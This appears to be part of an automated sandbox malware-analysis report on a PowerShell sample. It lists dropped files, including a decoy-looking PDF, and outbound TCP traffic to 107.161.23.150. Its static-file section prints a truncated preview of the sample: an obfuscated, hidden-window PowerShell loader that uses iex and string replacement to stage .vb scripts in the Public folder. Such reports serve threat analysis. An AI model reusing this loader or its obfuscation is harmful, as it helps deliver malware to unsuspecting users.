                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4e4pvsu.xbj.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xioxq03i.bmc.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-52-50-626.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.338264912747007
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                        MD5:128A51060103D95314048C2F32A15C66
                                                                                        SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                        SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                        SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                        Malicious:false
                                                                                        Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.363767555505381
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:kD32/bKyCeR54nKQguj9b76CZOCElB1fpW+icAMIRE1rRo6hJLllKpKL+Ugkb6y2:Pu/
                                                                                        MD5:B1C62DB05D9E1891B40762982C93098A
                                                                                        SHA1:66CE0CFE6C1CC921466EA1EFD034D04AE325CC0B
                                                                                        SHA-256:F2CB8B50D802BE2C7F90D8D2A9CFC81F5C4F9177F23EBF39E2664EA140B7ACEE
                                                                                        SHA-512:93164528AFCCF15DFDDC4CEBD4F489CC56C1B5710395734516CD62E45C114EF96E3F81A7AFAC052D29CA5C9A3400BF790F9C2EBF3A8F38F6FCC207932F78BDC3
                                                                                        Malicious:false
                                                                                        Preview:SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:645-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29752
                                                                                        Entropy (8bit):5.405218723481037
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbiSkkQTUhOLD2jSNajSkL63O4c4:V3fOCIdJDepgF
                                                                                        MD5:1897447A04797A1B671EBAF5286B96F3
                                                                                        SHA1:94ED35B14A01350273381D296E48682FFFEBD723
                                                                                        SHA-256:D43F77201A9C56DFE27E8C5B94503DFB71659191053E6F28477838083DC44450
                                                                                        SHA-512:A1E422B3C42BC5E1AFBF886D81119F8F868A3FC8410030FA6A3B2611BB6E4E2ECCC13BB792201166D28FBD9F26CC1EB87F13E1C87417584EB9F712626CED3F15
                                                                                        Malicious:false
                                                                                        Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\33e1e2a0-3c18-4e69-9086-f830b409424f.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\59999af8-c961-48fb-99e1-16e6c3d91739.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                                        MD5:95F182500FC92778102336D2D5AADCC8
                                                                                        SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                                        SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                                        SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\777ca69e-4813-4f27-9386-eb4e4f50ee18.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\b6e931ff-1dd7-4a05-9c38-f9d4b5ccbaaf.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):6224
                                                                                        Entropy (8bit):3.7371104200363083
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:NfkZ3CLT3kvhkvCCtAxJzYdaHH3xJzYdavHJ:NfkqfAxJzG6xJzGC
                                                                                        MD5:4E1573D912BCD1FB103D5792A8D9F3F8
                                                                                        SHA1:694890FB0897552CDB9CA8BE4F7CA7C228759522
                                                                                        SHA-256:43E1BACBA3FDEB80BFFCA0697B8B7AEC28C41456220275963FF85BB41A7D3086
                                                                                        SHA-512:07E86AB409414779A323E49A291E810909BCED83F1A7F24A63E53FD963958FE61E938D034B893C11483E9C9006D312A05BBE5FECCF07ACB38B5B1FFBF51A4E41
                                                                                        Malicious:false
                                                                                        Preview:...................................FL..................F.".. ...J.S......}.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...M..y.R.....}.R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.^...........................^.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW<2.Y.^..../.......................9.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.^....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.^....2.....................n.k.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.^....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.^....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.^....u...........

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XZBVHVC7BIQ0UUCREC8M.temp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):6224
                                                                                        Entropy (8bit):3.7371104200363083
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:NfkZ3CLT3kvhkvCCtAxJzYdaHH3xJzYdavHJ:NfkqfAxJzG6xJzGC
                                                                                        MD5:4E1573D912BCD1FB103D5792A8D9F3F8
                                                                                        SHA1:694890FB0897552CDB9CA8BE4F7CA7C228759522
                                                                                        SHA-256:43E1BACBA3FDEB80BFFCA0697B8B7AEC28C41456220275963FF85BB41A7D3086
                                                                                        SHA-512:07E86AB409414779A323E49A291E810909BCED83F1A7F24A63E53FD963958FE61E938D034B893C11483E9C9006D312A05BBE5FECCF07ACB38B5B1FFBF51A4E41
                                                                                        Malicious:false
                                                                                        Preview:...................................FL..................F.".. ...J.S......}.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...M..y.R.....}.R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.^...........................^.A.p.p.D.a.t.a...B.V.1......Y.^..Roaming.@......EW<2.Y.^..../.......................9.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.^....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.^....2.....................n.k.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.^....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.^....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.^....u...........

                                                                                        C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                        Category:dropped
                                                                                        Size (bytes):871324
                                                                                        Entropy (8bit):7.827941732382635
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                        MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                        SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                        SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                        SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:ASCII text, with very long lines (841), with no line terminators
                                                                                        Entropy (8bit):5.3303431651217075
                                                                                        TrID:
                                                                                          File name:raEyjKggAf.ps1
                                                                                          File size:841 bytes
                                                                                          MD5:99bc052a7f6d2e62a0735f79b86a543d
                                                                                          SHA1:eb62356e6d752cb670b6ff3568a376c5fd4adafa
                                                                                          SHA256:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270
                                                                                          SHA512:49849cda681472d18791b351807fe389f5e569f1add60a8282a02e2dcca63864d4ae126ecb224190bd8325e6127ba8e41a92daa4f56e82c3eb7679f8e42e5792
                                                                                          SSDEEP:24:X3vVGjjWITWxm4xLqlTNC/QWAa6KzI4twiTzo2al:tQKIo8lTNZKzIEw6o7
                                                                                          TLSH:7C0112892A8A8AE75551F55160C6493B3239C22569F604E3B6B4410716BCA7C0DD1C2A
                                                                                          File Content Preview:powershell -win hidden $h514zc=iex($('[Environment]::GetEk7ps'''.Replace('k7p','nvironmentVariable(''public'') + ''\\ppwfy1.vb')));$flol=iex($('[Environment]::GetEk7ps'''.Replace('k7p','nvironmentVariable(''public'') + ''\\hwj.vb')));function getit([strin

                                                                                          File Icon

                                                                                          Icon Hash:3270d6baae77db44

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 19, 2024 12:52:44.336647034 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:44.336764097 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:44.336849928 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:44.347543955 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:44.347563028 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:45.599318027 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:45.599404097 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:45.601229906 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:45.601236105 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:45.601475954 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:45.608612061 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:45.655337095 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.043443918 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.087353945 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:46.163454056 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.163471937 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.163512945 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.163537979 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:46.163589954 CET49714443192.168.2.6107.161.23.150
